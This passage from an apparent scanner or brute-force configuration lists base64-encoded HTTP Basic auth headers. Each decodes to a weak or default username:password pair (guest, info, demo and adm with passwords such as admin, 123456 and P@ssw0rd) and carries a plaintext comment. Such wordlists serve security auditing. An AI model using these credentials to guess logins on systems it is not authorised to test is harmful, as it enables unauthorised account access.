584 | - "BASIC Z3Vlc3Q6MXcydzN3" #guest:1w2w3w
585 | - "BASIC Z3Vlc3Q6MXcydzN3NHc=" #guest:1w2w3w4w
586 | - "BASIC Z3Vlc3Q6NTQzMjE=" #guest:54321
587 | - "BASIC Z3Vlc3Q6NjU0MzIx" #guest:654321
588 | - "BASIC Z3Vlc3Q6ODg4ODg4" #guest:888888
589 | - "BASIC Z3Vlc3Q6YQ==" #guest:a
590 | - "BASIC Z3Vlc3Q6YWJjMTIz" #guest:abc123
591 | - "BASIC Z3Vlc3Q6YWJjZDEyMzQ=" #guest:abcd1234
592 | - "BASIC Z3Vlc3Q6QWRtaW4=" #guest:Admin
593 | - "BASIC Z3Vlc3Q6YWRtaW4=" #guest:admin
594 | - "BASIC Z3Vlc3Q6YWRtaW4hQA==" #guest:admin!@
595 | - "BASIC Z3Vlc3Q6YWRtaW4x" #guest:admin1
596 | - "BASIC Z3Vlc3Q6YWRtaW4xMg==" #guest:admin12
597 | - "BASIC Z3Vlc3Q6YWRtaW4xMjM=" #guest:admin123
598 | - "BASIC Z3Vlc3Q6YWRtaW4xMjM0NTY=" #guest:admin123456
599 | - "BASIC Z3Vlc3Q6YWRtaW5pc3RyYXRvcg==" #guest:administrator
600 | - "BASIC Z3Vlc3Q6YWxwaW5l" #guest:alpine
601 | - "BASIC Z3Vlc3Q6YXNkMTIz" #guest:asd123
602 | - "BASIC Z3Vlc3Q6YXNkZg==" #guest:asdf
603 | - "BASIC Z3Vlc3Q6YXNkZjEyMzQ=" #guest:asdf1234
604 | - "BASIC Z3Vlc3Q6YXNkZmdo" #guest:asdfgh
605 | - "BASIC Z3Vlc3Q6Y2VudG9z" #guest:centos
606 | - "BASIC Z3Vlc3Q6Y2hhbmdlbWU=" #guest:changeme
607 | - "BASIC Z3Vlc3Q6Y2lzY28=" #guest:cisco
608 | - "BASIC Z3Vlc3Q6Y2lzY28xMjM=" #guest:cisco123
609 | - "BASIC Z3Vlc3Q6ZGVmYXVsdA==" #guest:default
610 | - "BASIC Z3Vlc3Q6aWRjIUA=" #guest:idc!@
611 | - "BASIC Z3Vlc3Q6amlhbWltYQ==" #guest:jiamima
612 | - "BASIC Z3Vlc3Q6bGV0bWVpbg==" #guest:letmein
613 | - "BASIC Z3Vlc3Q6bGludXg=" #guest:linux
614 | - "BASIC Z3Vlc3Q6bWFuYWdlcg==" #guest:manager
615 | - "BASIC Z3Vlc3Q6bWFzdGVy" #guest:master
616 | - "BASIC Z3Vlc3Q6b3JhY2xl" #guest:oracle
617 | - "BASIC Z3Vlc3Q6cEAkJHcwcmQ=" #guest:p@$$w0rd
618 | - "BASIC Z3Vlc3Q6UEBzc3cwcmQ=" #guest:P@ssw0rd
619 | - "BASIC Z3Vlc3Q6cEBzc3cwcmQ=" #guest:p@ssw0rd
620 | - "BASIC Z3Vlc3Q6UEBzc3cwcmQh" #guest:P@ssw0rd!
621 | - "BASIC Z3Vlc3Q6cEBzc3dvcmQ=" #guest:p@ssword
622 | - "BASIC Z3Vlc3Q6cGE1NXcwcmQ=" #guest:pa55w0rd
623 | - "BASIC Z3Vlc3Q6cGFzcw==" #guest:pass
624 | - "BASIC Z3Vlc3Q6cGFzc3cwcmQ=" #guest:passw0rd
625 | - "BASIC Z3Vlc3Q6cGFzc3dvcmQ=" #guest:password
626 | - "BASIC Z3Vlc3Q6cGFzc3dvcmQxMjM=" #guest:password123
627 | - "BASIC Z3Vlc3Q6cTF3MmUz" #guest:q1w2e3
628 | - "BASIC Z3Vlc3Q6cTF3MmUzcjQ=" #guest:q1w2e3r4
629 | - "BASIC Z3Vlc3Q6cTF3MmUzcjR0NQ==" #guest:q1w2e3r4t5
630 | - "BASIC Z3Vlc3Q6cWF6d3N4ZWRj" #guest:qazwsxedc
631 | - "BASIC Z3Vlc3Q6cXdlMTIz" #guest:qwe123
632 | - "BASIC Z3Vlc3Q6cXdlcjEyMzQ=" #guest:qwer1234
633 | - "BASIC Z3Vlc3Q6cXdlcnR5" #guest:qwerty
634 | - "BASIC Z3Vlc3Q6cXdlcnR5MTIz" #guest:qwerty123
635 | - "BASIC Z3Vlc3Q6cmVkaGF0" #guest:redhat
636 | - "BASIC Z3Vlc3Q6cm9vdA==" #guest:root
637 | - "BASIC Z3Vlc3Q6cm9vdDEyMw==" #guest:root123
638 | - "BASIC Z3Vlc3Q6cm9vdDEyMzQ=" #guest:root1234
639 | - "BASIC Z3Vlc3Q6cm9vdEAxMjM=" #guest:root@123
640 | - "BASIC Z3Vlc3Q6cm9vdHJvb3Q=" #guest:rootroot
641 | - "BASIC Z3Vlc3Q6c2VydmVy" #guest:server
642 | - "BASIC Z3Vlc3Q6c3VwZXJ1c2Vy" #guest:superuser
643 | - "BASIC Z3Vlc3Q6c3lzdGVt" #guest:system
644 | - "BASIC Z3Vlc3Q6VGVzdA==" #guest:Test
645 | - "BASIC Z3Vlc3Q6dGVzdA==" #guest:test
646 | - "BASIC Z3Vlc3Q6dGVzdDEyMw==" #guest:test123
647 | - "BASIC Z3Vlc3Q6dG9vcg==" #guest:toor
648 | - "BASIC Z3Vlc3Q6dWJudA==" #guest:ubnt
649 | - "BASIC Z3Vlc3Q6dWJ1bnR1" #guest:ubuntu
650 | - "BASIC Z3Vlc3Q6VXNlcg==" #guest:User
651 | - "BASIC Z3Vlc3Q6dXNlcg==" #guest:user
652 | - "BASIC Z3Vlc3Q6dm13YXJl" #guest:vmware
653 | - "BASIC Z3Vlc3Q6d2VsY29tZQ==" #guest:welcome
654 | - "BASIC Z3Vlc3Q6d3ViYW8=" #guest:wubao
655 | - "BASIC Z3Vlc3Q6emFxMTJ3c3g=" #guest:zaq12wsx
656 | - "BASIC Z3Vlc3Q6enhjdmJu" #guest:zxcvbn
657 | - "BASIC Z3Vlc3Q6enhjdmJubQ==" #guest:zxcvbnm
658 | - "BASIC Z3Vlc3Q6Y2hhbmdlaXQ=" #guest:changeit
659 | - "BASIC aW5mbzo=" #info:
660 | - "BASIC aW5mbzohUUFaMndzeA==" #info:!QAZ2wsx
661 | - "BASIC aW5mbzohcWF6QHdzeA==" #info:!qaz@wsx
662 | - "BASIC aW5mbzowMDAw" #info:0000
663 | - "BASIC aW5mbzowMDAwMDA=" #info:000000
664 | - "BASIC aW5mbzowMDAwMDAw" #info:0000000
665 | - "BASIC aW5mbzowMDAwMDAwMA==" #info:00000000
666 | - "BASIC aW5mbzowOTg3NjU0MzIx" #info:0987654321
667 | - "BASIC aW5mbzow" #info:0
668 | - "BASIC aW5mbzox" #info:1
669 | - "BASIC aW5mbzoy" #info:2
670 | - "BASIC aW5mbzoz" #info:3
671 | - "BASIC aW5mbzo0" #info:4
672 | - "BASIC aW5mbzo1" #info:5
673 | - "BASIC aW5mbzo2" #info:6
674 | - "BASIC aW5mbzo3" #info:7
675 | - "BASIC aW5mbzo4" #info:8
676 | - "BASIC aW5mbzo5" #info:9
677 | - "BASIC aW5mbzoxMTEx" #info:1111
678 | - "BASIC aW5mbzoxMTExMQ==" #info:11111
679 | - "BASIC aW5mbzoxMTExMTE=" #info:111111
680 | - "BASIC aW5mbzoxMTExMTEx" #info:1111111
681 | - "BASIC aW5mbzoxMTExMTExMQ==" #info:11111111
682 | - "BASIC aW5mbzoxMTIyMzM=" #info:112233
683 | - "BASIC aW5mbzoxMjEyMTI=" #info:121212
684 | - "BASIC aW5mbzoxMjM=" #info:123
685 | - "BASIC aW5mbzoxMjMxMjM=" #info:123123
686 | - "BASIC aW5mbzoxMjMzMjE=" #info:123321
687 | - "BASIC aW5mbzoxMjM0" #info:1234
688 | - "BASIC aW5mbzoxMjM0NQ==" #info:12345
689 | - "BASIC aW5mbzoxMjM0NTY=" #info:123456
690 | - "BASIC aW5mbzoxMjM0NTY3" #info:1234567
691 | - "BASIC aW5mbzoxMjM0NTY3OA==" #info:12345678
692 | - "BASIC aW5mbzoxMjM0NTY3ODk=" #info:123456789
693 | - "BASIC aW5mbzoxMjM0NTY3ODkw" #info:1234567890
694 | - "BASIC aW5mbzoxMjM0YWJjZA==" #info:1234abcd
695 | - "BASIC aW5mbzoxMjM0cXdlcg==" #info:1234qwer
696 | - "BASIC aW5mbzoxMjNhYmM=" #info:123abc
697 | - "BASIC aW5mbzoxMjNhc2Q=" #info:123asd
698 | - "BASIC aW5mbzoxMjNxd2U=" #info:123qwe
699 | - "BASIC aW5mbzoxMjNxd2Vhc2Q=" #info:123qweasd
700 | - "BASIC aW5mbzoxMnF3YXN6eA==" #info:12qwaszx
701 | - "BASIC aW5mbzoxZTJlM2U=" #info:1e2e3e
702 | - "BASIC aW5mbzoxZTJlM2U0ZQ==" #info:1e2e3e4e
703 | - "BASIC aW5mbzoxcTJxM3E=" #info:1q2q3q
704 | - "BASIC aW5mbzoxcTJxM3E0cQ==" #info:1q2q3q4q
705 | - "BASIC aW5mbzoxcTJ3M2U=" #info:1q2w3e
706 | - "BASIC aW5mbzoxcTJ3M2U0cg==" #info:1q2w3e4r
707 | - "BASIC aW5mbzoxcTJ3M2U0cjV0" #info:1q2w3e4r5t
708 | - "BASIC aW5mbzoxcWF6MndzeA==" #info:1qaz2wsx
709 | - "BASIC aW5mbzoxcWF6MndzeDNlZGM=" #info:1qaz2wsx3edc
710 | - "BASIC aW5mbzoxcWF6eHN3Mg==" #info:1qazxsw2
711 | - "BASIC aW5mbzoxcWF6WFNXQA==" #info:1qazXSW@
712 | - "BASIC aW5mbzoxdzJxIVdAUQ==" #info:1w2q!W@Q
713 | - "BASIC aW5mbzoxdzJ3M3c=" #info:1w2w3w
714 | - "BASIC aW5mbzoxdzJ3M3c0dw==" #info:1w2w3w4w
715 | - "BASIC aW5mbzo1NDMyMQ==" #info:54321
716 | - "BASIC aW5mbzo2NTQzMjE=" #info:654321
717 | - "BASIC aW5mbzo4ODg4ODg=" #info:888888
718 | - "BASIC aW5mbzph" #info:a
719 | - "BASIC aW5mbzphYmMxMjM=" #info:abc123
720 | - "BASIC aW5mbzphYmNkMTIzNA==" #info:abcd1234
721 | - "BASIC aW5mbzpBZG1pbg==" #info:Admin
722 | - "BASIC aW5mbzphZG1pbg==" #info:admin
723 | - "BASIC aW5mbzphZG1pbiFA" #info:admin!@
724 | - "BASIC aW5mbzphZG1pbjE=" #info:admin1
725 | - "BASIC aW5mbzphZG1pbjEy" #info:admin12
726 | - "BASIC aW5mbzphZG1pbjEyMw==" #info:admin123
727 | - "BASIC aW5mbzphZG1pbjEyMzQ1Ng==" #info:admin123456
728 | - "BASIC aW5mbzphZG1pbmlzdHJhdG9y" #info:administrator
729 | - "BASIC aW5mbzphbHBpbmU=" #info:alpine
730 | - "BASIC aW5mbzphc2QxMjM=" #info:asd123
731 | - "BASIC aW5mbzphc2Rm" #info:asdf
732 | - "BASIC aW5mbzphc2RmMTIzNA==" #info:asdf1234
733 | - "BASIC aW5mbzphc2RmZ2g=" #info:asdfgh
734 | - "BASIC aW5mbzpjZW50b3M=" #info:centos
735 | - "BASIC aW5mbzpjaGFuZ2VtZQ==" #info:changeme
736 | - "BASIC aW5mbzpjaXNjbw==" #info:cisco
737 | - "BASIC aW5mbzpjaXNjbzEyMw==" #info:cisco123
738 | - "BASIC aW5mbzpkZWZhdWx0" #info:default
739 | - "BASIC aW5mbzppZGMhQA==" #info:idc!@
740 | - "BASIC aW5mbzpqaWFtaW1h" #info:jiamima
741 | - "BASIC aW5mbzpsZXRtZWlu" #info:letmein
742 | - "BASIC aW5mbzpsaW51eA==" #info:linux
743 | - "BASIC aW5mbzptYW5hZ2Vy" #info:manager
744 | - "BASIC aW5mbzptYXN0ZXI=" #info:master
745 | - "BASIC aW5mbzpvcmFjbGU=" #info:oracle
746 | - "BASIC aW5mbzpwQCQkdzByZA==" #info:p@$$w0rd
747 | - "BASIC aW5mbzpQQHNzdzByZA==" #info:P@ssw0rd
748 | - "BASIC aW5mbzpwQHNzdzByZA==" #info:p@ssw0rd
749 | - "BASIC aW5mbzpQQHNzdzByZCE=" #info:P@ssw0rd!
750 | - "BASIC aW5mbzpwQHNzd29yZA==" #info:p@ssword
751 | - "BASIC aW5mbzpwYTU1dzByZA==" #info:pa55w0rd
752 | - "BASIC aW5mbzpwYXNz" #info:pass
753 | - "BASIC aW5mbzpwYXNzdzByZA==" #info:passw0rd
754 | - "BASIC aW5mbzpwYXNzd29yZA==" #info:password
755 | - "BASIC aW5mbzpwYXNzd29yZDEyMw==" #info:password123
756 | - "BASIC aW5mbzpxMXcyZTM=" #info:q1w2e3
757 | - "BASIC aW5mbzpxMXcyZTNyNA==" #info:q1w2e3r4
758 | - "BASIC aW5mbzpxMXcyZTNyNHQ1" #info:q1w2e3r4t5
759 | - "BASIC aW5mbzpxYXp3c3hlZGM=" #info:qazwsxedc
760 | - "BASIC aW5mbzpxd2UxMjM=" #info:qwe123
761 | - "BASIC aW5mbzpxd2VyMTIzNA==" #info:qwer1234
762 | - "BASIC aW5mbzpxd2VydHk=" #info:qwerty
763 | - "BASIC aW5mbzpxd2VydHkxMjM=" #info:qwerty123
764 | - "BASIC aW5mbzpyZWRoYXQ=" #info:redhat
765 | - "BASIC aW5mbzpyb290" #info:root
766 | - "BASIC aW5mbzpyb290MTIz" #info:root123
767 | - "BASIC aW5mbzpyb290MTIzNA==" #info:root1234
768 | - "BASIC aW5mbzpyb290QDEyMw==" #info:root@123
769 | - "BASIC aW5mbzpyb290cm9vdA==" #info:rootroot
770 | - "BASIC aW5mbzpzZXJ2ZXI=" #info:server
771 | - "BASIC aW5mbzpzdXBlcnVzZXI=" #info:superuser
772 | - "BASIC aW5mbzpzeXN0ZW0=" #info:system
773 | - "BASIC aW5mbzpUZXN0" #info:Test
774 | - "BASIC aW5mbzp0ZXN0" #info:test
775 | - "BASIC aW5mbzp0ZXN0MTIz" #info:test123
776 | - "BASIC aW5mbzp0b29y" #info:toor
777 | - "BASIC aW5mbzp1Ym50" #info:ubnt
778 | - "BASIC aW5mbzp1YnVudHU=" #info:ubuntu
779 | - "BASIC aW5mbzpVc2Vy" #info:User
780 | - "BASIC aW5mbzp1c2Vy" #info:user
781 | - "BASIC aW5mbzp2bXdhcmU=" #info:vmware
782 | - "BASIC aW5mbzp3ZWxjb21l" #info:welcome
783 | - "BASIC aW5mbzp3dWJhbw==" #info:wubao
784 | - "BASIC aW5mbzp6YXExMndzeA==" #info:zaq12wsx
785 | - "BASIC aW5mbzp6eGN2Ym4=" #info:zxcvbn
786 | - "BASIC aW5mbzp6eGN2Ym5t" #info:zxcvbnm
787 | - "BASIC aW5mbzpjaGFuZ2VpdA==" #info:changeit
788 | - "BASIC ZGVtbzo=" #demo:
789 | - "BASIC ZGVtbzohUUFaMndzeA==" #demo:!QAZ2wsx
790 | - "BASIC ZGVtbzohcWF6QHdzeA==" #demo:!qaz@wsx
791 | - "BASIC ZGVtbzowMDAw" #demo:0000
792 | - "BASIC ZGVtbzowMDAwMDA=" #demo:000000
793 | - "BASIC ZGVtbzowMDAwMDAw" #demo:0000000
794 | - "BASIC ZGVtbzowMDAwMDAwMA==" #demo:00000000
795 | - "BASIC ZGVtbzowOTg3NjU0MzIx" #demo:0987654321
796 | - "BASIC ZGVtbzow" #demo:0
797 | - "BASIC ZGVtbzox" #demo:1
798 | - "BASIC ZGVtbzoy" #demo:2
799 | - "BASIC ZGVtbzoz" #demo:3
800 | - "BASIC ZGVtbzo0" #demo:4
801 | - "BASIC ZGVtbzo1" #demo:5
802 | - "BASIC ZGVtbzo2" #demo:6
803 | - "BASIC ZGVtbzo3" #demo:7
804 | - "BASIC ZGVtbzo4" #demo:8
805 | - "BASIC ZGVtbzo5" #demo:9
806 | - "BASIC ZGVtbzoxMTEx" #demo:1111
807 | - "BASIC ZGVtbzoxMTExMQ==" #demo:11111
808 | - "BASIC ZGVtbzoxMTExMTE=" #demo:111111
809 | - "BASIC ZGVtbzoxMTExMTEx" #demo:1111111
810 | - "BASIC ZGVtbzoxMTExMTExMQ==" #demo:11111111
811 | - "BASIC ZGVtbzoxMTIyMzM=" #demo:112233
812 | - "BASIC ZGVtbzoxMjEyMTI=" #demo:121212
813 | - "BASIC ZGVtbzoxMjM=" #demo:123
814 | - "BASIC ZGVtbzoxMjMxMjM=" #demo:123123
815 | - "BASIC ZGVtbzoxMjMzMjE=" #demo:123321
816 | - "BASIC ZGVtbzoxMjM0" #demo:1234
817 | - "BASIC ZGVtbzoxMjM0NQ==" #demo:12345
818 | - "BASIC ZGVtbzoxMjM0NTY=" #demo:123456
819 | - "BASIC ZGVtbzoxMjM0NTY3" #demo:1234567
820 | - "BASIC ZGVtbzoxMjM0NTY3OA==" #demo:12345678
821 | - "BASIC ZGVtbzoxMjM0NTY3ODk=" #demo:123456789
822 | - "BASIC ZGVtbzoxMjM0NTY3ODkw" #demo:1234567890
823 | - "BASIC ZGVtbzoxMjM0YWJjZA==" #demo:1234abcd
824 | - "BASIC ZGVtbzoxMjM0cXdlcg==" #demo:1234qwer
825 | - "BASIC ZGVtbzoxMjNhYmM=" #demo:123abc
826 | - "BASIC ZGVtbzoxMjNhc2Q=" #demo:123asd
827 | - "BASIC ZGVtbzoxMjNxd2U=" #demo:123qwe
828 | - "BASIC ZGVtbzoxMjNxd2Vhc2Q=" #demo:123qweasd
829 | - "BASIC ZGVtbzoxMnF3YXN6eA==" #demo:12qwaszx
830 | - "BASIC ZGVtbzoxZTJlM2U=" #demo:1e2e3e
831 | - "BASIC ZGVtbzoxZTJlM2U0ZQ==" #demo:1e2e3e4e
832 | - "BASIC ZGVtbzoxcTJxM3E=" #demo:1q2q3q
833 | - "BASIC ZGVtbzoxcTJxM3E0cQ==" #demo:1q2q3q4q
834 | - "BASIC ZGVtbzoxcTJ3M2U=" #demo:1q2w3e
835 | - "BASIC ZGVtbzoxcTJ3M2U0cg==" #demo:1q2w3e4r
836 | - "BASIC ZGVtbzoxcTJ3M2U0cjV0" #demo:1q2w3e4r5t
837 | - "BASIC ZGVtbzoxcWF6MndzeA==" #demo:1qaz2wsx
838 | - "BASIC ZGVtbzoxcWF6MndzeDNlZGM=" #demo:1qaz2wsx3edc
839 | - "BASIC ZGVtbzoxcWF6eHN3Mg==" #demo:1qazxsw2
840 | - "BASIC ZGVtbzoxcWF6WFNXQA==" #demo:1qazXSW@
841 | - "BASIC ZGVtbzoxdzJxIVdAUQ==" #demo:1w2q!W@Q
842 | - "BASIC ZGVtbzoxdzJ3M3c=" #demo:1w2w3w
843 | - "BASIC ZGVtbzoxdzJ3M3c0dw==" #demo:1w2w3w4w
844 | - "BASIC ZGVtbzo1NDMyMQ==" #demo:54321
845 | - "BASIC ZGVtbzo2NTQzMjE=" #demo:654321
846 | - "BASIC ZGVtbzo4ODg4ODg=" #demo:888888
847 | - "BASIC ZGVtbzph" #demo:a
848 | - "BASIC ZGVtbzphYmMxMjM=" #demo:abc123
849 | - "BASIC ZGVtbzphYmNkMTIzNA==" #demo:abcd1234
850 | - "BASIC ZGVtbzpBZG1pbg==" #demo:Admin
851 | - "BASIC ZGVtbzphZG1pbg==" #demo:admin
852 | - "BASIC ZGVtbzphZG1pbiFA" #demo:admin!@
853 | - "BASIC ZGVtbzphZG1pbjE=" #demo:admin1
854 | - "BASIC ZGVtbzphZG1pbjEy" #demo:admin12
855 | - "BASIC ZGVtbzphZG1pbjEyMw==" #demo:admin123
856 | - "BASIC ZGVtbzphZG1pbjEyMzQ1Ng==" #demo:admin123456
857 | - "BASIC ZGVtbzphZG1pbmlzdHJhdG9y" #demo:administrator
858 | - "BASIC ZGVtbzphbHBpbmU=" #demo:alpine
859 | - "BASIC ZGVtbzphc2QxMjM=" #demo:asd123
860 | - "BASIC ZGVtbzphc2Rm" #demo:asdf
861 | - "BASIC ZGVtbzphc2RmMTIzNA==" #demo:asdf1234
862 | - "BASIC ZGVtbzphc2RmZ2g=" #demo:asdfgh
863 | - "BASIC ZGVtbzpjZW50b3M=" #demo:centos
864 | - "BASIC ZGVtbzpjaGFuZ2VtZQ==" #demo:changeme
865 | - "BASIC ZGVtbzpjaXNjbw==" #demo:cisco
866 | - "BASIC ZGVtbzpjaXNjbzEyMw==" #demo:cisco123
867 | - "BASIC ZGVtbzpkZWZhdWx0" #demo:default
868 | - "BASIC ZGVtbzppZGMhQA==" #demo:idc!@
869 | - "BASIC ZGVtbzpqaWFtaW1h" #demo:jiamima
870 | - "BASIC ZGVtbzpsZXRtZWlu" #demo:letmein
871 | - "BASIC ZGVtbzpsaW51eA==" #demo:linux
872 | - "BASIC ZGVtbzptYW5hZ2Vy" #demo:manager
873 | - "BASIC ZGVtbzptYXN0ZXI=" #demo:master
874 | - "BASIC ZGVtbzpvcmFjbGU=" #demo:oracle
875 | - "BASIC ZGVtbzpwQCQkdzByZA==" #demo:p@$$w0rd
876 | - "BASIC ZGVtbzpQQHNzdzByZA==" #demo:P@ssw0rd
877 | - "BASIC ZGVtbzpwQHNzdzByZA==" #demo:p@ssw0rd
878 | - "BASIC ZGVtbzpQQHNzdzByZCE=" #demo:P@ssw0rd!
879 | - "BASIC ZGVtbzpwQHNzd29yZA==" #demo:p@ssword
880 | - "BASIC ZGVtbzpwYTU1dzByZA==" #demo:pa55w0rd
881 | - "BASIC ZGVtbzpwYXNz" #demo:pass
882 | - "BASIC ZGVtbzpwYXNzdzByZA==" #demo:passw0rd
883 | - "BASIC ZGVtbzpwYXNzd29yZA==" #demo:password
884 | - "BASIC ZGVtbzpwYXNzd29yZDEyMw==" #demo:password123
885 | - "BASIC ZGVtbzpxMXcyZTM=" #demo:q1w2e3
886 | - "BASIC ZGVtbzpxMXcyZTNyNA==" #demo:q1w2e3r4
887 | - "BASIC ZGVtbzpxMXcyZTNyNHQ1" #demo:q1w2e3r4t5
888 | - "BASIC ZGVtbzpxYXp3c3hlZGM=" #demo:qazwsxedc
889 | - "BASIC ZGVtbzpxd2UxMjM=" #demo:qwe123
890 | - "BASIC ZGVtbzpxd2VyMTIzNA==" #demo:qwer1234
891 | - "BASIC ZGVtbzpxd2VydHk=" #demo:qwerty
892 | - "BASIC ZGVtbzpxd2VydHkxMjM=" #demo:qwerty123
893 | - "BASIC ZGVtbzpyZWRoYXQ=" #demo:redhat
894 | - "BASIC ZGVtbzpyb290" #demo:root
895 | - "BASIC ZGVtbzpyb290MTIz" #demo:root123
896 | - "BASIC ZGVtbzpyb290MTIzNA==" #demo:root1234
897 | - "BASIC ZGVtbzpyb290QDEyMw==" #demo:root@123
898 | - "BASIC ZGVtbzpyb290cm9vdA==" #demo:rootroot
899 | - "BASIC ZGVtbzpzZXJ2ZXI=" #demo:server
900 | - "BASIC ZGVtbzpzdXBlcnVzZXI=" #demo:superuser
901 | - "BASIC ZGVtbzpzeXN0ZW0=" #demo:system
902 | - "BASIC ZGVtbzpUZXN0" #demo:Test
903 | - "BASIC ZGVtbzp0ZXN0" #demo:test
904 | - "BASIC ZGVtbzp0ZXN0MTIz" #demo:test123
905 | - "BASIC ZGVtbzp0b29y" #demo:toor
906 | - "BASIC ZGVtbzp1Ym50" #demo:ubnt
907 | - "BASIC ZGVtbzp1YnVudHU=" #demo:ubuntu
908 | - "BASIC ZGVtbzpVc2Vy" #demo:User
909 | - "BASIC ZGVtbzp1c2Vy" #demo:user
910 | - "BASIC ZGVtbzp2bXdhcmU=" #demo:vmware
911 | - "BASIC ZGVtbzp3ZWxjb21l" #demo:welcome
912 | - "BASIC ZGVtbzp3dWJhbw==" #demo:wubao
913 | - "BASIC ZGVtbzp6YXExMndzeA==" #demo:zaq12wsx
914 | - "BASIC ZGVtbzp6eGN2Ym4=" #demo:zxcvbn
915 | - "BASIC ZGVtbzp6eGN2Ym5t" #demo:zxcvbnm
916 | - "BASIC ZGVtbzpjaGFuZ2VpdA==" #demo:changeit
917 | - "BASIC YWRtOg==" #adm:
918 | - "BASIC YWRtOiFRQVoyd3N4" #adm:!QAZ2wsx
919 | - "BASIC YWRtOiFxYXpAd3N4" #adm:!qaz@wsx
920 | - "BASIC YWRtOjAwMDA=" #adm:0000
921 | - "BASIC YWRtOjAwMDAwMA==" #adm:000000
922 | - "BASIC YWRtOjAwMDAwMDA=" #adm:0000000
923 | - "BASIC YWRtOjAwMDAwMDAw" #adm:00000000
924 | - "BASIC YWRtOjA5ODc2NTQzMjE=" #adm:0987654321
925 | - "BASIC YWRtOjA=" #adm:0
926 | - "BASIC YWRtOjE=" #adm:1
927 | - "BASIC YWRtOjI=" #adm:2
928 | - "BASIC YWRtOjM=" #adm:3
929 | - "BASIC YWRtOjQ=" #adm:4
930 | - "BASIC YWRtOjU=" #adm:5
931 | - "BASIC YWRtOjY=" #adm:6
932 | - "BASIC YWRtOjc=" #adm:7
933 | - "BASIC YWRtOjg=" #adm:8
934 | - "BASIC YWRtOjk=" #adm:9
935 | - "BASIC YWRtOjExMTE=" #adm:1111
936 | - "BASIC YWRtOjExMTEx" #adm:11111
937 | - "BASIC YWRtOjExMTExMQ==" #adm:111111
938 | - "BASIC YWRtOjExMTExMTE=" #adm:1111111
939 | - "BASIC YWRtOjExMTExMTEx" #adm:11111111
940 | - "BASIC YWRtOjExMjIzMw==" #adm:112233
941 | - "BASIC YWRtOjEyMTIxMg==" #adm:121212
942 | - "BASIC YWRtOjEyMw==" #adm:123
943 | - "BASIC YWRtOjEyMzEyMw==" #adm:123123
944 | - "BASIC YWRtOjEyMzMyMQ==" #adm:123321
945 | - "BASIC YWRtOjEyMzQ=" #adm:1234
946 | - "BASIC YWRtOjEyMzQ1" #adm:12345
947 | - "BASIC YWRtOjEyMzQ1Ng==" #adm:123456
948 | - "BASIC YWRtOjEyMzQ1Njc=" #adm:1234567
949 | - "BASIC YWRtOjEyMzQ1Njc4" #adm:12345678
950 | - "BASIC YWRtOjEyMzQ1Njc4OQ==" #adm:123456789
951 | - "BASIC YWRtOjEyMzQ1Njc4OTA=" #adm:1234567890
952 | - "BASIC YWRtOjEyMzRhYmNk" #adm:1234abcd
953 | - "BASIC YWRtOjEyMzRxd2Vy" #adm:1234qwer
954 | - "BASIC YWRtOjEyM2FiYw==" #adm:123abc
955 | - "BASIC YWRtOjEyM2FzZA==" #adm:123asd
956 | - "BASIC YWRtOjEyM3F3ZQ==" #adm:123qwe
957 | - "BASIC YWRtOjEyM3F3ZWFzZA==" #adm:123qweasd
958 | - "BASIC YWRtOjEycXdhc3p4" #adm:12qwaszx
959 | - "BASIC YWRtOjFlMmUzZQ==" #adm:1e2e3e
960 | - "BASIC YWRtOjFlMmUzZTRl" #adm:1e2e3e4e
961 | - "BASIC YWRtOjFxMnEzcQ==" #adm:1q2q3q
962 | - "BASIC YWRtOjFxMnEzcTRx" #adm:1q2q3q4q
963 | - "BASIC YWRtOjFxMnczZQ==" #adm:1q2w3e
964 | - "BASIC YWRtOjFxMnczZTRy" #adm:1q2w3e4r
965 | - "BASIC YWRtOjFxMnczZTRyNXQ=" #adm:1q2w3e4r5t
966 | - "BASIC YWRtOjFxYXoyd3N4" #adm:1qaz2wsx
967 | - "BASIC YWRtOjFxYXoyd3N4M2VkYw==" #adm:1qaz2wsx3edc
968 | - "BASIC YWRtOjFxYXp4c3cy" #adm:1qazxsw2
969 | - "BASIC YWRtOjFxYXpYU1dA" #adm:1qazXSW@
970 | - "BASIC YWRtOjF3MnEhV0BR" #adm:1w2q!W@Q
971 | - "BASIC YWRtOjF3Mnczdw==" #adm:1w2w3w
972 | - "BASIC YWRtOjF3MnczdzR3" #adm:1w2w3w4w
973 | - "BASIC YWRtOjU0MzIx" #adm:54321
974 | - "BASIC YWRtOjY1NDMyMQ==" #adm:654321
975 | - "BASIC YWRtOjg4ODg4OA==" #adm:888888
976 | - "BASIC YWRtOmE=" #adm:a
977 | - "BASIC YWRtOmFiYzEyMw==" #adm:abc123
978 | - "BASIC YWRtOmFiY2QxMjM0" #adm:abcd1234
979 | - "BASIC YWRtOkFkbWlu" #adm:Admin
980 | - "BASIC YWRtOmFkbWlu" #adm:admin
981 | - "BASIC YWRtOmFkbWluIUA=" #adm:admin!@
982 | - "BASIC YWRtOmFkbWluMQ==" #adm:admin1
983 | - "BASIC YWRtOmFkbWluMTI=" #adm:admin12
984 | - "BASIC YWRtOmFkbWluMTIz" #adm:admin123
985 | - "BASIC YWRtOmFkbWluMTIzNDU2" #adm:admin123456
986 | - "BASIC YWRtOmFkbWluaXN0cmF0b3I=" #adm:administrator
987 | - "BASIC YWRtOmFscGluZQ==" #adm:alpine
988 | - "BASIC YWRtOmFzZDEyMw==" #adm:asd123
989 | - "BASIC YWRtOmFzZGY=" #adm:asdf
990 | - "BASIC YWRtOmFzZGYxMjM0" #adm:asdf1234
991 | - "BASIC YWRtOmFzZGZnaA==" #adm:asdfgh
992 | - "BASIC YWRtOmNlbnRvcw==" #adm:centos
993 | - "BASIC YWRtOmNoYW5nZW1l" #adm:changeme
994 | - "BASIC YWRtOmNpc2Nv" #adm:cisco
995 | - "BASIC YWRtOmNpc2NvMTIz" #adm:cisco123
996 | - "BASIC YWRtOmRlZmF1bHQ=" #adm:default
997 | - "BASIC YWRtOmlkYyFA" #adm:idc!@
998 | - "BASIC YWRtOmppYW1pbWE=" #adm:jiamima
999 | - "BASIC YWRtOmxldG1laW4=" #adm:letmein
1000 | - "BASIC YWRtOmxpbnV4" #adm:linux
1001 | - "BASIC YWRtOm1hbmFnZXI=" #adm:manager
1002 | - "BASIC YWRtOm1hc3Rlcg==" #adm:master
1003 | - "BASIC YWRtOm9yYWNsZQ==" #adm:oracle
1004 | - "BASIC YWRtOnBAJCR3MHJk" #adm:p@$$w0rd
1005 | - "BASIC YWRtOlBAc3N3MHJk" #adm:P@ssw0rd
1006 | - "BASIC YWRtOnBAc3N3MHJk" #adm:p@ssw0rd
1007 | - "BASIC YWRtOlBAc3N3MHJkIQ==" #adm:P@ssw0rd!
